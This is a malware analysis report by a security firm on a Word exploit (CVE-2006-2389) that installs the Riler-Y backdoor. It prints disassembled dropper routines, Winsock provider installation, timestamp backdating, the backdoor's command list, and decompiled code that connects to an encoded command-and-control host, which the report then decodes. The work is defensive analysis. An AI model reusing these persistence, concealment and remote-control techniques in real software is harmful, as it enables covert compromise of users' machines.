Malware Analysis Report

Torrid Networks Pvt Ltd

Malware Analysis Report

Submitted to

Confidential
Submitted by

www.torridnetworks.com

Date: 5th January, 2009

By accepting this document, you agree that neither this document nor the information disclosed herein, nor any part thereof, shall be
reproduced or transferred to other documents, or used or disclosed to others for any commercial purpose except as specifically authorized in
writing by Torrid. The document has been shared by Torrid for educational purpose only and shall not be held liable for any damage that you
might cause by performing similar task on your machine.

1
Unauthorized copying for any commercial purpose without permission is highly prohibited.

B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com


Table of Contents
The Email Attachment ............................................................................................................................ 3
Behind the Curtains ............................................................................................................................. 3
The Exploit .............................................................................................................................................. 4
Anatomy of an Attacker ....................................................................................................................... 5
Observations ....................................................................................................................................... 6
File Changes & Process Binding ........................................................................................................ 6
Dynamic Analysis ........................................................................................................................ 6
Dynamic Analysis ........................................................................................................................ 7
Static Analysis ............................................................................................................................. 7
Disassembled binary in Assembly Language: ............................................................................... 7
Service Changes ............................................................................................................................. 10
Dynamic Analysis ...................................................................................................................... 10
Static Analysis ........................................................................................................................... 10
Disassembled binary in Assembly Language: ............................................................................. 10
Registry Changes ........................................................................................................................... 11
The Backdoor ........................................................................................................................................ 12
Static Analysis ........................................................................................................................... 12
Disassembled DLL in C Language: .............................................................................................. 12
The Control Connection ........................................................................................................................ 13
Active Attack ..................................................................................................................................... 13
Disabled Attack (Our Scenario) .......................................................................................................... 13
Static Analysis ........................................................................................................................... 16
Disassembled DLL in C Language:.............................................................................................. 16
Decoding the String:.................................................................................................................. 18
Summary .............................................................................................................................................. 19
Conclusion ............................................................................................................................................ 19

2



The Email Attachment
The sole goal of the word attachment is to transport the exploit, and to convince the reader to click on
it, so the malicious code can execute.

Behind the Curtains
We submitted the word attachment to Virus Total and got the following result summary. The result is
showing that the word file is Multistream Compound file and contains an exploit with it.

The result is also showing that the controller is quite old enough. According to the previous analysis
report found on the internet, the control version name at that time is Stealth 2.6 but after the whole
analysis we find that this control version name is Stealth 8.1 which seems to be the latest one.

3



The Exploit

The email message contains a word attachment which exploits client side vulnerability “Buffer overflow”
( CVE-2006-2389 ) in Microsoft Word in Office 2000 SP3, Office XP SP3, Office 2003 Sp1 and SP2, and
Microsoft Works Suites through 2006, allows user-assisted attackers to execute arbitrary code via a
malformed object pointer, as originally reported by ISC on 20060519 for a zero-day attack.

4



Anatomy of an Attacker

5



Observations
File Changes & Process Binding

1. The word file exploits the vulnerability and executes the payload which creates an executable
file “winsock.exe” in the Temp folder.

Dynamic Analysis

2. The executable file “winsock.exe” further unpacks into two embedded components in the
system32 folder:
a) “feelcat.ini”: This file contains the path of winsock.exe “C:Documents and
SettingsanksLocal SettingsTempwinsock.exe”
b) “toonjoke.dll”: detected as Troj/Riler-Gen
3. After the files are created the backdoor binds the toonjoke.dll with svchost as a LSP(Layered
Service Provider)

Troj/Riler-Y will install the file toonjoke.dll as a Windows Sockets 2 transport provider and reorder the
WSC Chain such that it gets called first.

6



Dynamic Analysis

Static Analysis

Disassembled binary in Assembly Language:
1. The following Sub-Routine creates & opens File Name toonjoke.dll and writes data from 403014
and 406E14 location to toonjoke.dll
sub_401000 proc near ; CODE XREF: sub_401533+4Fp
Filename = dword ptr 4
push esi
push offset Mode ; Mode
push [esp+8+Filename] ; Filename
call fopen
mov esi, eax
pop ecx
test esi, esi
pop ecx
jnz short loc_401019
pop esi
retn

loc_401019: ; CODE XREF: sub_401000+15j
push esi ; File
push Count ; Count
push 1 ; Size
push offset dword_403014 ; Str
call fwrite
push 0 ; Origin
push 0D0h ; Offset
push esi ; File

7



call fseek
push esi ; File
push 2 ; Count
push 1 ; Size
push offset dword_406E14 ; Str
call fwrite
push esi ; File
call fclose
add esp, 30h
push 1
pop eax
pop esi
retn
sub_401000 endp

2. The following Sub-Routine creates & opens File Name filecat.ini file with contents as path to the
winsock.exe
sub_401983 proc near ; CODE XREF: sub_401533+5Fp

Filename = byte ptr -104h

push ebp
mov ebp, esp
sub esp, 104h
push esi
push offset Buffer
push dword_5207A4 ; Format
lea eax, [ebp+Filename]
push eax ; Dest
call sprintf
lea eax, [ebp+Filename]
push offset aW ; "w"
push eax ; Filename
call fopen
mov esi, eax
add esp, 14h
test esi, esi
jz short loc_4019DD
push esi ; File
push offset Filename ; Str
call fputs
push esi ; File
push offset Str ; "n"
call fputs
push esi ; File
call fclose
add esp, 14h

loc_4019DD: ; CODE XREF: sub_401983+39j
pop esi
leave
retn
sub_401983 endp

8



3. At the following location Sub-Routine changes the timestamp to make toonjoke.dll non-
searchable by clicking on “Modified Date” tab in windows Explorer. It basically sets the date for
year 2000 so that the file gets mixed and doesn’t appear on the top of Windows/System32
folder as recent modified documents.

loc_4010B8: ; CODE XREF: sub_401056+2Fj
; sub_401056+3Cj ...
xor edi, edi
push edi ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push edi ; lpSecurityAttributes
push 2 ; dwShareMode
push 40000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call CreateFileA
mov esi, eax
lea eax, [ebp+CreationTime]
push eax ; lpLastWriteTime
lea eax, [ebp+CreationTime]
push edi ; lpLastAccessTime
push eax ; lpCreationTime
push esi ; hFile
call SetFileTime
push esi ; hObject
call CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_401056 endp

9



Service Changes
A new service “Windows Socket 2.0 Non-IFS Service Provider Support Environment” is started.

Dynamic Analysis
The following snapshot shows that a new service “Windows Socket 2.0 Non-IFS Service Provider Support
Environment” is started which is having a highest severity level “1”.

Static Analysis

Disassembled binary in Assembly Language:
1. The following Sub-Routine calls Install Provider as MSNT Service Provider
loc_401674: ; CODE XREF: sub_4015B2+D6j
movsx dx, Dest[ecx]
mov [eax], dx
inc ecx
inc eax
inc eax
cmp ecx, 104h
jl short loc_401674
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4FC]
push 1
push eax
push eax
push offset dword_406F28
call WSCInstallProvider
cmp eax, 0FFFFFFFFh
jz loc_4018DC
call sub_401976
call sub_401903
xor esi, esi

10



cmp dword_5207AC, ebx
jle short loc_401701

2. The following Sub-Routine calls Install Provider as MSNT Service Chain
loc_401786: ; CODE XREF: sub_4015B2+154j
push eax
lea eax, [ebp+var_B78]
push esi
push eax
push eax
push offset dword_406F38
call WSCInstallProvider
cmp eax, 0FFFFFFFFh
jnz short loc_4017BC
push [ebp+var_10]
push offset aWscinstallprov ; "WSCInstallProvider for chain Error: %d"
call printf
pop ecx
pop ecx
jmp loc_4018DC

Registry Changes

The following changes in the registry were observed.

Dynamic Analysis

11



The Backdoor
After the successful exploitation a backdoor Trojan of Troj/Riler-Y family is installed.

Static Analysis

Disassembled DLL in C Language:
The following is the list of commands that can be received from the Control Server of the Trojan after
the successful connection with the compromised client. Network traffic from client to server also
contains the string “VER: Stealth 8.1” along with IP address, Netbios name, OS Version, etc. of the
compromised host.
void __thiscall sub_10001970(char *this)
{
char *EndPtr; // [sp+0h] [bp-4h]@1

EndPtr = this;
off_100059F0 = "VER: Stealth 8.1";
lpName = "whX3656";
off_100059F8 = "LOCK";
off_100059FC = "SEND";
Format = "%sMS_Woople.ini";
off_10005A10 = "WAKE";
off_10005A14 = "NAME";
off_10005A18 = "MOON";
off_10005A1C = "KEEP";
off_10005A20 = "DISK";
off_10005A24 = "FILE";
off_10005A28 = "DONE";
off_10005A2C = "DOWN";
off_10005A30 = "LONG";
off_10005A34 = "MAKE";
off_10005A38 = "ATTR";
off_10005A3C = "KILL";
off_10005A40 = "LIKE";
off_10005A44 = "SEEK";
off_10005A48 = "READ";
off_10005A4C = "DEAD";
off_10005A50 = "DDLL";
off_10005A54 = "AUTO";
lpString2 = "DIR:";
byte_10005A74 = "NAME: %s";
off_10005A78 = "L_IP: %s";
off_10005A7C = "MARK: ";
off_10005A80 = "OS: NT";
off_10005A84 = "OS: WN";
off_10005A88 = "%ssourcejob.dat";
off_10005A8C = "%suidmngr.ini";
off_10005A90 = "%stupix.ini";
off_10005AB0[0] = "ERR code = ";
off_10005AB4 = "F zzz <more>";
off_10005AB8 = "READY";
off_10005ABC = "END:";
off_10005AC0 = "DRIVE %c:";
off_10005AC4 = "C:*.*";
off_10005AC8 = "%s00";
dword_1000580C = 371;
dword_10005810 = strtol("99C", &EndPtr, 10);
sub_10001930();

12



The Control Connection

Active Attack
In order for the Trojan to be effective it needs the Compromise Client to make a successful connection
with the Control Server which is a two step process:

1. A DNS lookup to acquire the address of the control server;
2. The actual connection.

Disabled Attack (Our Scenario)
In our scenario the Compromised Client did not find the address of the Control Server, so a Control
connection is not established between them and the Compromised Client not able to receive the
commands from the Control Server.

13



Dynamic Analysis
The following packet capture shows that client was not able to find the address for msnmsn.3322.org.

14



The following packet capture shows that the compromised client wants to establish a connection with
the control server (msnmsn.3322.org) on port number 8080.

To get going with the analysis, a local and unauthorized DNS server was setup for domain name
3322.org with A record for msnmsn.3322.org pointing to 10.1.1.130 which is our own honeypot server
used for analysis.

15



Static Analysis

Disassembled DLL in C Language:
The following code creates a socket with the encrypted hostname FLGFLGejjiieHK@ (msnmsn.3322.org)
and on port number ogog (8080).

signed int __cdecl sub_10002450()
{
int v0; // edi@1
int v1; // ecx@3
char *v2; // edx@4
int v3; // ecx@4
LPSTR (__stdcall *v4)(LPSTR, LPCSTR); // ebx@4
HANDLE v5; // ebp@6
u_short v6; // si@6
signed int v8; // esi@38
int v9; // esi@50
const CHAR *v10; // edi@51
HANDLE v11; // esi@72
SOCKET v12; // [sp-Ch] [bp-E8h]@15
char *v13; // [sp-8h] [bp-E4h]@4
const char *v14; // [sp-8h] [bp-E4h]@15
const char *v15; // [sp-8h] [bp-E4h]@46
int v16; // [sp-4h] [bp-E0h]@4
int v17; // [sp-4h] [bp-E0h]@14
char *v18; // [sp-4h] [bp-E0h]@46
char Str; // [sp+10h] [bp-CCh]@4
HANDLE hObject; // [sp+18h] [bp-C4h]@6
CHAR String1; // [sp+1Ch] [bp-C0h]@4
char v22; // [sp+5Ch] [bp-80h]@45

sub_10002CB0();
v0 = 0;
if ( !dword_100064F4 )
sub_10002BB0();
v1 = dword_100064F0++;
if ( v1 <= 5 )
{
v4 = lstrcpyA;
lstrcpyA(&String1, "FLGFLGejjiieHK@ "); //Host Name msnmsn.3322.org
v2 = &Str;
v16 = (int)"ogog "; //Port 8080
v13 = &Str;
}
else
{
v4 = lstrcpyA;
dword_100064F0 = 0;
lstrcpyA(&String1, "FLGFLGejjiieHK@ ");
v16 = (int)"ogog ";
v13 = &Str;
}
((void (__fastcall *)(int, char *, char *, int))v4)(v3, v2, v13, v16);

sub_10002E60(&String1);
sub_10002E60(&Str);

16



Following Code Decodes the hostname and port number by subtracting 55 to the Decimal value of the
ACSII character.

signed int __cdecl sub_10002E60(const char *a1)
{
signed int result; // eax@1
int v2; // edx@1
unsigned int v3; // kr00_4@1

result = 0;
v2 = 0;
v3 = strlen(a1);
if ( (signed int)(v3 - 1) > 0 )
{
do
{
result = a1[v2];
if ( result == 32 )
{
a1[v2] = 0;
}
else
{
result -= 55;
if ( result < 33 )
result += 94;
a1[v2] = result;
}
++v2;
}
while ( v2 < (signed int)(v3 - 1) );
}
return result;
}

17



Decoding the String:
As per the above logic the following table decodes the encrypted character string which results
hostname as “msnmsn.3322.org” and port number as”8080”

Characters from Decimal Value Result = Dec Value If (Result<33) Decoded
String - 55 Result + 94 Character
F 70 15 109 m
L 76 21 115 s
G 71 16 110 n
F 70 15 109 m
L 76 21 115 s
G 71 16 110 n
e 101 46 .
j 106 51 3
j 106 51 3
i 105 50 2
i 105 50 2
e 101 46 .
H 72 17 111 o
K 75 20 114 r
@ 64 9 103 g
o 111 56 8
g 103 48 0
o 111 56 8
g 103 48 0

18



Summary
The control server for the backdoor was setup at msnmsn.3322.org (Encoded as FLGFLGejjiieHK@ in the
DLL as shown above) which originates at China and this attack is pretty old one and it seems that federal
agencies have already taken down the host name msnmsn.3322.org and there is no DNS record for this
sub-domain.

Backdoor is intelligently programmed to resolve the domain name msnmsn.3322.org to IP address by
doing the DNS lookup with some delay inherited, hence making it difficult to catch while analyzing
network traffic. Also, there is no network activity from the backdoor till the time DNS lookup is not
done.

To check for the network activity of the trojan, we setup a local DNS server with master DNS zone
3322.org and thereafter we added another A record msnmsn.3322.org pointing to our internal server
running with honeypot. We simulated the backdoor setup once again to see the DNS query being
resolved by the backdoor as IP of honeypot. We captured the traffic using sniffer tool and found that
after getting positive response from the DNS query, backdoor again waits for few minutes just to
confuse the researcher and after a delay, it establishes TCP connection to the resolved IP address (in our
case, honeypot’s IP) at the port number 8080 (encoded as ogog in the DLL as shown above). After
establishing the connection at port 8080, it waits for some inputs from the server before performing any
activity. Since the control server has been shutdown hence backdoor doesn’t get the commands from
the remote server and stays as a stealth backdoor waiting for its master to come live again.

This particular attack was reported in around 2005 and the backdoor payload is very old which was
firstly reported in 2002 and was named as Riler-Y Trojan and there have been few variants from this
family in the past. Most of the time, these are part of targeted attack and are not the attacks on the
wild. Analysis suggests that the version for controller is Stealth 8.1 which seems to be new version of
controller with more features like remote VNC, command, DLL injection, etc.

Conclusion
Though the attack cannot be treated as successful attack due to unavailability of control server which
was supposed to be hosted at msnmsn.3322.org, it is highly recommended to remove the Trojan
manually by following above analysis report or using some antivirus software from the already
compromised machine to avoid losing the control to attacker in case the dead control server is made
live again. Also, use patched version of MS Office for older versions (2000, 2003) or it is always
recommended to use the latest product release (MS Office 2007 in this case).

Contact/Feedback:
info@torridnetworks.com

19


Malware Analysis Report

More Related Content

Similar to Malware Analysis Report

Recently uploaded

Malware Analysis Report